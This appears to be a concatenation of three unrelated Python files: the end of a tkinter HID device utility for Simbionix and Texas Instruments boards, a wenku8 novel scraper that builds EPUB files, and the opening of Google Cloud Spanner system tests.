row = my_channel_row(frame=frame,row=row,label="InnerHandle",style="InnerHandle")
else:
row = my_channel_row(frame=frame,row=row,label="PRODUCT_ID_STATION",style="InnerHandle")
# Seperator
row = my_seperator(frame, row)
# Clicker labels
ttk.Label(frame,text="InnerClicker").grid(row=row,column=0,sticky=tk.W)
ttk.Label(frame,text="Clicker").grid(row=row,column=1)
ttk.Label(frame,text="ClickerCounter").grid(row=row,column=2)
row += 1
# Clicker data
w = tk.Checkbutton(frame,state=tk.DISABLED)
global inner_clicker
inner_clicker = w
w.grid(row=row,column=0)
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style="Clicker")
progressbars.append(w)
w.grid(row=row,column=1)
# yg: adding clicker counter display
w = ttk.Entry(frame,width=20,)
global clicker_counter_entry
clicker_counter_entry = w
w.grid(
#padx=10,#pady=5,
row=row,
column=2,#sticky=tk.W,
)
row += 1
# Seperator
row = my_seperator(frame, row)
# Red handle and reset button labels
ttk.Label(frame,text="RedHandle").grid(row=row,column=0,sticky=tk.W)
ttk.Label(frame,text="ResetButton").grid(row=row,column=1)
ttk.Label(frame,text="IgnoreRedHandlefault").grid(row=row,column=2)
row += 1
# Red handle and reset button data
w = tk.Checkbutton(frame,state=tk.DISABLED)
global red_handle
red_handle = w
w.grid(row=row,column=0)
w = tk.Checkbutton(frame,state=tk.DISABLED)
global reset_check
reset_check = w
w.grid(row=row,column=1)
red_handle_ignore = tk.Button(frame,text ="Start streaming",command = streaming_button_CallBack)
red_handle_ignore.grid(row=row,column=3)
# checkbox for the ignore red handle
w = tk.Checkbutton(frame,state=tk.DISABLED)
# global ignore_red
# ignore_red = w
global ignore_red_handle_checkbutton
ignore_red_handle_checkbutton = w
w.grid(row=row,column=2)
row += 1
# Seperator
row = my_seperator(frame, row)
# Counter
ttk.Label(frame,text="PacketsCounter:").grid(row=row,column=0,sticky=tk.E,)
w = ttk.Entry(frame,width=20,
# """state=tk.DISABLED"""
)
global counter_entry
counter_entry = w
w.grid(padx=10,pady=5,row=row,column=1,columnspan=2,sticky=tk.W,)
# HID_Util Fault indication
ttk.Label(frame,text="Faultindication:").grid(row=row,column=1,sticky=tk.E,)
w = ttk.Entry(
frame,
width=20,
)
global fault_entry
fault_entry = w
w.grid(
padx=10,
pady=5,
row=row,
column=2,
columnspan=2,
sticky=tk.W,
)
row += 1
# Seperator
row = my_seperator(frame, row)
# sleepTimer
ttk.Label(
frame,
text="Sleep Timer"
).grid(
row=row,
column=0,
sticky=tk.E,
)
w = ttk.Progressbar(
frame,
orient=tk.HORIZONTAL,
length=LONG_PROGRESS_BAR_LEN,
style="sleepTimer"
)
progressbars.append(w)
w.grid(
row=row,
column=1,
columnspan=3
)
row += 1
# Seperator
row = my_seperator(frame, row)
# battery level
ttk.Label(
frame,
text="battery level"
).grid(
row=row,
column=0,
sticky=tk.E,
)
w = ttk.Progressbar(
frame,
orient=tk.HORIZONTAL,
length=LONG_PROGRESS_BAR_LEN,
style="batteryLevel"
)
progressbars.append(w)
w.grid(
row=row,
column=1,
columnspan=3
)
row += 1
# Seperator
row = my_seperator(frame, row)
# Motor Cur
ttk.Label(
frame,
text="Motor Current"
).grid(
row=row,
column=0,
sticky=tk.E,
)
w = ttk.Progressbar(
frame,
orient=tk.HORIZONTAL,
length=LONG_PROGRESS_BAR_LEN,
style="motorCurrent"
)
progressbars.append(w)
w.grid(
row=row,
column=1,
columnspan=3
)
row += 1
# Seperator
row = my_seperator(frame, row)
red_handle_ignore = tk.Button(frame,text ="Get Board Type",command = board_type_button_callback)
red_handle_ignore.grid(row=row,column=0)
red_handle_ignore = tk.Button(frame,text ="Keep alive (fast BLE)",command = alive_button_CallBack)
red_handle_ignore.grid(row=row,column=1)
red_handle_ignore = tk.Button(frame,text ="Moderate BLE",command = moderate_button_CallBack)
red_handle_ignore.grid(row=row,column=2)
row += 1
row = my_seperator(frame, row)
red_handle_ignore = tk.Button(frame,text ="BSL !!!(DONT PRESS)",command = BSL_mode_button_CallBack)
red_handle_ignore.grid(row=row,column=2)
def init_parser():
parser = argparse.ArgumentParser(
description="Read the HID data from target board.\nIf no argument is given, the program exits."
)
parser.add_argument(
"-v", "--vendor",
dest="vendor_id",
metavar="VENDOR_ID",
type=int,
nargs=1,
required=False,
help="connects to the device with the vendor ID"
)
parser.add_argument(
"-p", "--product",
dest="product_id",
metavar="PRODUCT_ID",
type=int,
nargs=1,
required=False,
help="connects to the device with that product ID"
)
parser.add_argument(
"-a", "--path",
dest="path",
metavar="PATH",
type=str,
nargs=1,
required=False,
help="connects to the device with the given path"
)
return parser
def main():
global VENDOR_ID
global PRODUCT_ID
PATH = None
# open recording log file:
# file1 = open("C:\Work\Python\HID_Util\src\log\log2.txt","w")
# Parse the command line arguments
parser = init_parser()
args = parser.parse_args(sys.argv[1:])
# Initialize the flags according from the command line arguments
avail_vid = args.vendor_id != None
avail_pid = args.product_id != None
avail_path = args.path != None
id_mode = avail_pid and avail_vid
path_mode = avail_path
default_mode = (not avail_vid) and (not avail_pid) and (not avail_path)
if (path_mode and (avail_pid or avail_vid)):
print("The path argument can't be mixed with the ID arguments")
return
if ((not avail_path) and ((avail_pid and (not avail_vid)) or ((not avail_pid) and avail_vid))):
print("Both the product ID and the vendor ID must be given as arguments")
return
if (default_mode):
print("No arguments were given, defaulting to:")
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
id_mode = True
elif (id_mode):
VENDOR_ID = args.vendor_id[0]
PRODUCT_ID = args.product_id[0] #run over with 772 == 0x304
elif (path_mode):
PATH = args.path[0]
else:
raise NotImplementedError
device = None
try:
if (id_mode):
try:
print("try with default device:")
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
except:
print("wrong ID")
print(" ")
# 0x24B3 = 9395
# 0x2005 = 8197
for n in range(7):
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x24b3 # Simbionix
PRODUCT_ID = 0x2000 + n # LAP_NEW_CAMERA. is 0x2005
# print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID)
print("try with PID = %X " % PRODUCT_ID)
# print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
# device = hid.Device(vid=0x24B3, pid=0x2005)
# print("success vid=0x24B3, pid=0x2005 !!")
except:
print("wrong ID2")
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x24b3 # Simbionix
PRODUCT_ID = PRODUCT_ID_CTAG
print("try with PID = %X " % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
if device is not None:
device.write(DEFAULT_WRITE_DATA)
except:
print("wrong ID3")
# VENDOR_ID = 2047
# PRODUCT_ID = 304
# 0x2047 = 8263
# 0x304 = 772
# 0x0301 // Product ID (PID) - base for Prime products family
for n in range(len(PRODUCT_ID_types)):
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x2047 # Texas Instrument
PRODUCT_ID = 0x301 + n # BOARD_TYPE_MAIN is 0x301
# print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID)
print("try with PID = %X " % PRODUCT_ID)
# print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
# device = hid.Device(vid=0x24B3, pid=0x2005)
# print("success vid=0x24B3, pid=0x2005 !!")
except:
print("wrong ID4")
if device is None:
print("no device attached")
else:
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
global special_cmd
if PRODUCT_ID in PRODUCT_ID_types:
print(PRODUCT_ID_types[PRODUCT_ID])
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
if PRODUCT_ID in PRODUCT_ID_types:
special_cmd = 'B'
# root. destroy()
elif PRODUCT_ID == PRODUCT_ID_CTAG:
print("BOARD_TYPE: CTAG --- new in bsl.exe")
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
if PRODUCT_ID in PRODUCT_ID_types:
special_cmd = 'B'
elif (path_mode):
device = hid.Device(path=PATH)
else:
raise NotImplementedError
# # Initialize the main window
# global root
# root = tk.Tk()
# root.title("HID_Util")
#
# # Initialize the GUI widgets
# my_widgets(root)
# Create thread that calls
threading.Thread(target=gui_loop, args=(device,), daemon=True).start()
global WRITE_DATA
if WRITE_DATA == WRITE_DATA_CMD_B:
print("WRITE_DATA == WRITE_DATA_CMD_B")
# threading.Thread(target=gui_loop, args=(device,), daemon=True).stop()
print(" Recording Ended !!!")
print(" ")
print(" Please press <Enter> to Exit")
input()
# Run the GUI main loop
# root.mainloop()
finally:
# global file1
# file1.close() #to change file access modes
if device != None:
device.close()
if __name__ == "__main__":
main()
|
wk8.py
|
import os, re, threading
import bs4, requests as R
from bs4 import BeautifulSoup as Soup
from lib import epub
from lib.logger import getLogger
from lib.constants import *
def req(method : str, url : str, headers : dict = {}, payload : dict = {}, cookies = None):
return R.request(method, url, headers = headers | USER_AGENT, data = payload, cookies = cookies)
def reqr(soup : bool, method : str, url : str, headers : dict = {}, payload : dict = {}, cookies = None):
res = R.request(method, url, headers = headers | USER_AGENT, data = payload, cookies = cookies)
html = res.content.decode("gbk", errors="ignore")
if soup: return res, html, Soup(html, PARSER)
else: return res, html
mxLen = 0
def progressBar(pre, x, y):
global mxLen
print(' '*(mxLen * 2), end='\r')
CNT = 20
spc = CNT * x // y
p = "%s: %d/%d [%s%s]" % (pre, x,y, "=" * spc, "." * (CNT - spc))
mxLen = max(mxLen, len(p))
print(p, end='\r')
class Wenku8:
def __init__(self):
self.cookies = ""
self.cookie_jar = None
self.image_count = 0
self.image_total = 0
self.book = None
self.L = getLogger("wenku8")
def login(self, username= OPT['account'][0], password= OPT['account'][1]):
self.L.debug("正在登陆: 使用账号 %s 密码 %s" % (username, password))
data = {'action': 'login', 'jumpurl': '', 'username': username, 'password': password}
res, html = reqr(False, 'post', API['login'], CONTENT_TYPES['post'], data)
if '登录成功' not in html:
self.L.error("登陆失败: 返回内容 %s" % html)
return False
self.cookies = ''
for key, value in res.cookies.items():
self.cookies += "%s=%s;" % (key, value)
self.L.debug("登陆成功。Cookie: %s" % self.cookies)
self.cookie_jar = res.cookies
return True
def is_login(self):
return len(self.cookies) != 0 and self.cookie_jar is not None
def search(self, key: str):
if not self.is_login():
self.login()
if not self.is_login():
self.L.error("登陆失败,无法搜索。")
return False
m1 = self.search_one(API["search1"], key)
m2 = self.search_one(API["search2"], key)
self.L.debug("搜索 %s: 结果共 %d 条,API 1: %d, API 2: %d" % (key, len(m1) + len(m2), len(m1), len(m2)))
return m1 + m2
def search_one(self, API: str, key: str):
if not self.is_login():
return []
headers = {'Cookie': self.cookies}
encodings = key.encode('gbk').hex().upper()
key_arg = ''
for i in range(0, len(encodings), 2):
key_arg += "%%%s%s" % (encodings[i], encodings[i + 1])
self.L.debug("搜索: URL: %s" % API % key_arg)
res, html, soup = reqr(True, "get", API % key_arg, headers, {}, self.cookie_jar)
if '推一下' in html:
title = soup.find_all('b')[1].get_text()
bid = ''
for n in re.findall(r'\d', res.url)[1:]:
bid = bid + n
bid = int(bid)
try:
cover = soup.find_all('img')[1].get_attribute_list('src')[0]
except IndexError:
cover = None
try:
status = soup.find_all('table')[0].find_all('tr')[2].get_text().replace('\n', ' ')
except IndexError:
status = None
try:
brief = soup.find_all('table')[2].find_all('td')[1].find_all('span')[4].get_text()
except IndexError:
spans = soup.find_all('span')
for i in range(len(spans)):
if '内容简介' in spans[i].get_text():
brief = spans[i + 1].get_text()
book = {
'title': title, 'bid': bid, 'cover': cover, 'status': status, 'brief': brief
}
self.L.debug("搜索: 书名 %s, ID %d, 封面链接 %s, 状态 %s, 简介 %s" % (title, bid, cover, status, brief))
return [book, ]
td = soup.find('td')
if td is None: return []
books = []
for content in td.children:
if not isinstance(content, bs4.element.Tag):
continue
title = content.find_all('a')[1].get_text()
url = content.find_all('a')[1].get_attribute_list('href')[0]
numbers = re.findall(r'\d', url)[1:]
bid = ''
for n in numbers:
bid = bid + n
bid = int(bid)
cover = content.find_all('img')[0].get_attribute_list('src')[0]
status = content.find_all('p')[0].get_text()
brief = content.find_all('p')[1].get_text()[3:]
book = {
'title': title, 'bid': bid, 'cover': cover, 'status': status, 'brief': brief
}
self.L.debug("搜索: 书名 %s, ID %d, 封面链接 %s, 状态 %s, 简介 %s" % (title, bid, cover, status, brief))
books.append(book)
return books
def bookinfo(self, book_id: int):
url = "%s%s" % (API["book"] % (("%04d" % book_id)[0], book_id), "index.htm")
self.L.debug("图书信息: %d: URL %s" % (book_id, url))
__, html, soup = reqr(True, "get", url)
table = soup.select('table')
if len(table) == 0:
self.L.error("图书信息: 无法获取,更多信息请打开调试模式")
self.L.debug("返回页面: %s" % html)
return None
table = table[0]
if len(soup.select("#title")) == 0:
self.L.error("图书信息: 该书不存在。")
return None
title = soup.select("#title")[0].get_text()
author = soup.select("#info")[0].get_text().split('作者:')[-1]
url_cover = API["img"] % (("%04d" % book_id)[0], book_id, book_id)
brief = ''
url = API["info"] % (book_id)
__, html, soup = reqr(True, "get", url)
update = ''
for td in soup.find_all('td'):
if '最后更新' in td.get_text():
update = td.get_text()[5:]
iscopyright = '因版权问题,文库不再提供该小说的在线阅读与下载服务!' not in soup.get_text()
spans = soup.select('span')
for i in range(len(spans)):
span = spans[i]
if '内容简介' in span.get_text():
brief = spans[i + 1].get_text()
self.L.debug("图书信息: %d: 标题 %s, 作者 %s, 简介 %s, 封面链接 %s, 版权 %s, 最后更新 %s" % (book_id, title, author, brief, url_cover, str(iscopyright), update))
return {
"id": book_id,
"name": title,
"author": author,
"brief": brief,
"cover": url_cover,
'copyright': iscopyright,
'update': update
}
def get_page(self, url_page: str, title: str = ''):
__, html = reqr(False, 'get', url_page)
html = re.sub(r"\[sup\](.{1,50})\[\/sup\]", r"<sup>\1</sup>", html)
soup = Soup(html, PARSER)
content = soup.select('#content')[0]
[s.extract() for s in content("ul")] # 去除 <ul>
return "<h1>%s</h1>%s" % (title, content.prettify(formatter="html"))
def fetch_img(self, url_img: str):
self.L.debug("图片链接为: %s" % url_img)
data_img = req('get', url_img).content
filename = os.path.basename(url_img)
self.book.addImage(filename, data_img)
self.image_count += 1
progressBar(self.chapter_name + " 插图", self.image_count, self.image_total)
return True
def isImg(self, x):
for i in IMG_PREFIXES:
if i in x: return True
return False
def fetch_chapter(self, a, order: int):
title_page = a.get_text()
url_page = "%s%s" % (API['book'] % (("%04d" % self.book.book_id)[0], self.book.book_id), a.get('href'))
self.L.debug("%s下载: %s: %s - %s" % ("插图" if title_page == "插图" else "章节", title_page, a.get('href'), url_page))
soup = Soup(self.get_page(url_page, title=title_page), PARSER)
imgcontent = soup.select(".imagecontent")
if not OPT['noImage']:
if len(imgcontent) > 0:
self.L.debug("图书下载: %s: 可能的封面: %s" % (title_page, imgcontent[0].get("src")))
self.cover_frombook = imgcontent[0].get("src")
if OPT['downloadImage']:
img_pool = []
imgcontent = [i for i in filter(lambda x: self.isImg(x.get("src")), imgcontent)]
self.image_total += len(imgcontent)
for img in imgcontent:
url_img = img.get("src")
self.L.debug("%s下载: 图片: %s in %s" % ("插图" if title_page == "插图" else "章节", url_img, title_page))
img["src"] = "images/" + os.path.basename(img.get("src"))
if img.parent.name == 'a':
img.parent.unwrap()
th = threading.Thread(target=self.fetch_img, args=(url_img,), daemon=True)
if OPT['imgPool']: th.start()
img_pool.append(th)
for it in img_pool: # no multi thread, one by one is significantly quicker
if not OPT['imgPool']: it.start()
it.join()
else:
for img in imgcontent:
if img.parent.name == 'a':
img.parent.unwrap()
else:
for i in imgcontent:
if i.parent.name == 'a':
i.parent.unwrap()
i.extract()
self.chapter_count += 1
progressBar(self.chapter_name, self.chapter_count, self.chapter_total)
self.book.addChapter(order, title_page, soup.prettify(formatter="html"))
def get_volume(self, book_id: int, book_info: dict[str], volume_index: int, hrefs: list[str], sub_title: str, base_title: str, author: str, backup_cover: str):
self.cover_frombook = None
self.book = epub.Book({
"identifier": "%d-%.3d" % (book_id, volume_index),
"title": "%s %s" % (base_title, sub_title),
"language": "zh",
"creator": author,
"contributor": "wenku8toepub",
"publisher": "wenku8",
"date": book_info["update"],
"description": book_info["brief"]
}, book_id, "%s %s" % (base_title, sub_title), len(hrefs))
pool = []
self.image_count = self.image_total = self.chapter_count = 0
self.chapter_name = "%s %s" % (base_title, sub_title)
self.chapter_total = len(hrefs)
for index, href in enumerate(hrefs):
th = threading.Thread(target=self.fetch_chapter, args=(href, index), daemon=True)
if OPT['chapterPool']: th.start()
pool.append(th)
for th in pool:
if not OPT['chapterPool']: th.start()
th.join()
fn = OPT['outputDir'] + "\\[%s][%s][%.3d]%s.epub" % (author, base_title, volume_index + 1, sub_title)
if OPT['noImage'] or not OPT['downloadCover']:
# self.L.info("图书分卷 %s %s: 保存到 %s" % (base_title, sub_title, fn))
return self.book.finalize(fn, None, None)
else:
if self.cover_frombook is None:
cover_file = backup_cover
else:
cover_file = self.cover_frombook
cover_data = req('get', cover_file).content
cover_data = b""
__, cover_ext = os.path.splitext(cover_file)
self.L.debug("图书分卷 %s %s: 采用封面 [%d]: %s" % (base_title, sub_title, len(cover_data), cover_file))
# self.L.info("图书分卷 %s %s: 保存到 %s" % (base_title, sub_title, fn))
return self.book.finalize(fn, cover_data, cover_ext)
def get_book(self, book_id: int, book_info: dict[str]):
book_url = "%s%s" % (API['book'] % (("%04d" % book_id)[0], book_id), "index.htm")
self.L.debug("图书下载: %d: URL %s" % (book_id, book_url))
__, html, soup = reqr(True, 'get', book_url)
table = soup.select('table')
if len(table) == 0:
self.L.error("图书下载: %d: 找不到内容,返回页面为 %s" % html)
return False
table = table[0]
if len(soup.select("#title")) == 0:
self.L.error("图书下载: %d: 找不到标题,返回页面为 %s" % html)
return
title = soup.select("#title")[0].get_text()
author = soup.select("#info")[0].get_text().split('作者:')[-1]
url_cover = API['img'] % (("%04d" % book_id)[0], book_id, book_id)
if OPT['simplifyTitle']:
title = re.sub(r"\(.*?\)", "", title)
book_info['name'] = re.sub(r"\(.*?\)", "", book_info['name'])
self.L.debug('图书下载: %d: 标题 %s, 作者 %s' % (book_id, title, author))
iscopyright = '因版权问题,文库不再提供该小说的在线阅读与下载服务!' not in soup.get_text()
if not iscopyright:
self.L.error('图书下载: %s: 没有版权,下载中断。', title)
return False
A = [i for i in filter(lambda x : x.get_text().encode() != b'\xc2\xa0', table.select('td'))]
trs = [i[0] for i in filter(lambda x : len(x[1].select('a')) == 0, enumerate(A))]
self.L.debug("分卷数: %d 页面数: %d" % (len(A), len(trs)))
self.L.info('图书下载: %d [%s] %s 共 %d 分卷' % (book_id, author, title, len(trs)))
for ind, tr in enumerate(trs):
subtitle = A[tr].get_text()
self.L.debug("分卷 %d 页面范围 %d - %d" % (ind + 1, tr+2, len(A) if ind == len(trs) - 1 else trs[ind + 1]))
hrefs = [i.select('a')[0] for i in (A[tr+1:] if ind == len(trs) - 1 else A[tr+1:trs[ind+1]])]
self.get_volume(book_id, book_info, ind, hrefs, subtitle, title, author, url_cover)
return True
|
test_system.py
|
# Copyright 2016 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import datetime
import decimal
import math
import operator
import os
import struct
import threading
import time
import unittest
import uuid
import grpc
from google.rpc import code_pb2
from google.api_core import exceptions
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
from google.cloud.spanner_v1 import param_types
from google.cloud.spanner_v1 import TypeCode
from google.cloud.spanner_v1 import Type
from google.cloud._helpers import UTC
from google.cloud.spanner_v1 import BurstyPool
from google.cloud.spanner_v1 import COMMIT_TIMESTAMP
from google.cloud.spanner_v1 import Client
from google.cloud.spanner_v1 import KeyRange
from google.cloud.spanner_v1 import KeySet
from google.cloud.spanner_v1.instance import Backup
from google.cloud.spanner_v1.instance import Instance
from test_utils.retry import RetryErrors
from test_utils.retry import RetryInstanceState
from test_utils.retry import RetryResult
from test_utils.system import unique_resource_id
from tests._fixtures import DDL_STATEMENTS
from tests._fixtures import EMULATOR_DDL_STATEMENTS
from tests._helpers import OpenTelemetryBase, HAS_OPENTELEMETRY_INSTALLED
CREATE_INSTANCE = os.getenv("GOOGLE_CLOUD_TESTS_CREATE_SPANNER_INSTANCE") is not None
USE_EMULATOR = os.getenv("SPANNER_EMULATOR_HOST") is not None
SKIP_BACKUP_TESTS = os.getenv("SKIP_BACKUP_TESTS") is not None
SPANNER_OPERATION_TIMEOUT_IN_SECONDS = int(
os.getenv("SPANNER_OPERATION_TIMEOUT_IN_SECONDS", 60)
)
if CREATE_INSTANCE:
INSTANCE_ID = "google-cloud" + unique_resource_id("-")
else:
INSTANCE_ID = os.environ.get(
"GOOGLE_CLOUD_TESTS_SPANNER_INSTANCE", "google-cloud-python-systest"
)
EXISTING_INSTANCES = []
COUNTERS_TABLE = "counters"
COUNTERS_COLUMNS = ("name", "value")
BASE_ATTRIBUTES = {
"db.type": "spanner",
"db.url": "spanner.googleapis.com",
"net.host.name": "spanner.googleapis.com",
}
_STATUS_CODE_TO_GRPC_STATUS_CODE = {
member.value[0]: member for member in grpc.StatusCode
}
class Config(object):
"""Run-time configuration to be modified at set-up.
This is a mutable stand-in to allow test set-up to modify
global state.
"""
CLIENT = None
INSTANCE_CONFIG = None
INSTANCE = None
def _has_all_ddl(database):
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
return len(database.ddl_statements) == len(ddl_statements)
def _list_instances():
return list(Config.CLIENT.list_instances())
def setUpModule():
if USE_EMULATOR:
from google.auth.credentials import AnonymousCredentials
emulator_project = os.getenv("GCLOUD_PROJECT", "emulator-test-project")
Config.CLIENT = Client(
project=emulator_project, credentials=AnonymousCredentials()
)
else:
Config.CLIENT = Client()
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
instances = retry(_list_instances)()
EXISTING_INSTANCES[:] = instances
# Delete test instances that are older than an hour.
cutoff = int(time.time()) - 1 * 60 * 60
instance_pbs = Config.CLIENT.list_instances("labels.python-spanner-systests:true")
for instance_pb in instance_pbs:
instance = Instance.from_pb(instance_pb, Config.CLIENT)
if "created" not in instance.labels:
continue
create_time = int(instance.labels["created"])
if create_time > cutoff:
continue
# Instance cannot be deleted while backups exist.
for backup_pb in instance.list_backups():
backup = Backup.from_pb(backup_pb, instance)
backup.delete()
instance.delete()
if CREATE_INSTANCE:
if not USE_EMULATOR:
# Defend against back-end returning configs for regions we aren't
# actually allowed to use.
configs = [config for config in configs if "-us-" in config.name]
if not configs:
raise ValueError("List instance configs failed in module set up.")
Config.INSTANCE_CONFIG = configs[0]
config_name = configs[0].name
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
Config.INSTANCE = Config.CLIENT.instance(
INSTANCE_ID, config_name, labels=labels
)
created_op = Config.INSTANCE.create()
created_op.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # block until completion
else:
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID)
Config.INSTANCE.reload()
def tearDownModule():
if CREATE_INSTANCE:
Config.INSTANCE.delete()
class TestInstanceAdminAPI(unittest.TestCase):
def setUp(self):
self.instances_to_delete = []
def tearDown(self):
for instance in self.instances_to_delete:
instance.delete()
@unittest.skipIf(
CREATE_INSTANCE, "This test fails when system tests are run in parallel."
)
def test_list_instances(self):
instances = list(Config.CLIENT.list_instances())
# We have added one new instance in `setUpModule`.
if CREATE_INSTANCE:
self.assertEqual(len(instances), len(EXISTING_INSTANCES) + 1)
for instance in instances:
instance_existence = (
instance in EXISTING_INSTANCES or instance == Config.INSTANCE
)
self.assertTrue(instance_existence)
def test_reload_instance(self):
# Use same arguments as Config.INSTANCE (created in `setUpModule`)
# so we can use reload() on a fresh instance.
instance = Config.CLIENT.instance(INSTANCE_ID)
# Make sure metadata unset before reloading.
instance.display_name = None
def _expected_display_name(instance):
return instance.display_name == Config.INSTANCE.display_name
retry = RetryInstanceState(_expected_display_name)
retry(instance.reload)()
self.assertEqual(instance.display_name, Config.INSTANCE.display_name)
@unittest.skipUnless(CREATE_INSTANCE, "Skipping instance creation")
def test_create_instance(self):
ALT_INSTANCE_ID = "new" + unique_resource_id("-")
instance = Config.CLIENT.instance(ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name)
operation = instance.create()
# Make sure this instance gets deleted after the test case.
self.instances_to_delete.append(instance)
# We want to make sure the operation completes.
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
# Create a new instance instance and make sure it is the same.
instance_alt = Config.CLIENT.instance(
ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name
)
instance_alt.reload()
self.assertEqual(instance, instance_alt)
self.assertEqual(instance.display_name, instance_alt.display_name)
@unittest.skipIf(USE_EMULATOR, "Skipping updating instance")
def test_update_instance(self):
OLD_DISPLAY_NAME = Config.INSTANCE.display_name
NEW_DISPLAY_NAME = "Foo Bar Baz"
Config.INSTANCE.display_name = NEW_DISPLAY_NAME
operation = Config.INSTANCE.update()
# We want to make sure the operation completes.
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
# Create a new instance instance and reload it.
instance_alt = Config.CLIENT.instance(INSTANCE_ID, None)
self.assertNotEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
instance_alt.reload()
self.assertEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
# Make sure to put the instance back the way it was for the
# other test cases.
Config.INSTANCE.display_name = OLD_DISPLAY_NAME
Config.INSTANCE.update()
class _TestData(object):
TABLE = "contacts"
COLUMNS = ("contact_id", "first_name", "last_name", "email")
ROW_DATA = (
(1, u"Phred", u"Phlyntstone", u"[email protected]"),
(2, u"Bharney", u"Rhubble", u"[email protected]"),
(3, u"Wylma", u"Phlyntstone", u"[email protected]"),
)
ALL = KeySet(all_=True)
SQL = "SELECT * FROM contacts ORDER BY contact_id"
_recurse_into_lists = True
def _assert_timestamp(self, value, nano_value):
self.assertIsInstance(value, datetime.datetime)
self.assertIsNone(value.tzinfo)
self.assertIs(nano_value.tzinfo, UTC)
self.assertEqual(value.year, nano_value.year)
self.assertEqual(value.month, nano_value.month)
self.assertEqual(value.day, nano_value.day)
self.assertEqual(value.hour, nano_value.hour)
self.assertEqual(value.minute, nano_value.minute)
self.assertEqual(value.second, nano_value.second)
self.assertEqual(value.microsecond, nano_value.microsecond)
if isinstance(value, DatetimeWithNanoseconds):
self.assertEqual(value.nanosecond, nano_value.nanosecond)
else:
self.assertEqual(value.microsecond * 1000, nano_value.nanosecond)
def _check_rows_data(self, rows_data, expected=None):
if expected is None:
expected = self.ROW_DATA
self.assertEqual(len(rows_data), len(expected))
for row, expected in zip(rows_data, expected):
self._check_row_data(row, expected)
def _check_row_data(self, row_data, expected):
self.assertEqual(len(row_data), len(expected))
for found_cell, expected_cell in zip(row_data, expected):
self._check_cell_data(found_cell, expected_cell)
def _check_cell_data(self, found_cell, expected_cell):
if isinstance(found_cell, DatetimeWithNanoseconds):
self._assert_timestamp(expected_cell, found_cell)
elif isinstance(found_cell, float) and math.isnan(found_cell):
self.assertTrue(math.isnan(expected_cell))
elif isinstance(found_cell, list) and self._recurse_into_lists:
self.assertEqual(len(found_cell), len(expected_cell))
for found_item, expected_item in zip(found_cell, expected_cell):
self._check_cell_data(found_item, expected_item)
else:
self.assertEqual(found_cell, expected_cell)
class TestDatabaseAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.drop()
def test_list_databases(self):
# Since `Config.INSTANCE` is newly created in `setUpModule`, the
# database created in `setUpClass` here will be the only one.
database_names = [
database.name for database in Config.INSTANCE.list_databases()
]
self.assertTrue(self._db.name in database_names)
def test_create_database(self):
pool = BurstyPool(labels={"testcase": "create_database"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
database_ids = [database.name for database in Config.INSTANCE.list_databases()]
self.assertIn(temp_db.name, database_ids)
@unittest.skipIf(
USE_EMULATOR, "PITR-lite features are not supported by the emulator"
)
def test_create_database_pitr_invalid_retention_period(self):
pool = BurstyPool(labels={"testcase": "create_database_pitr"})
temp_db_id = "temp_db" + unique_resource_id("_")
retention_period = "0d"
ddl_statements = [
"ALTER DATABASE {}"
" SET OPTIONS (version_retention_period = '{}')".format(
temp_db_id, retention_period
)
]
temp_db = Config.INSTANCE.database(
temp_db_id, pool=pool, ddl_statements=ddl_statements
)
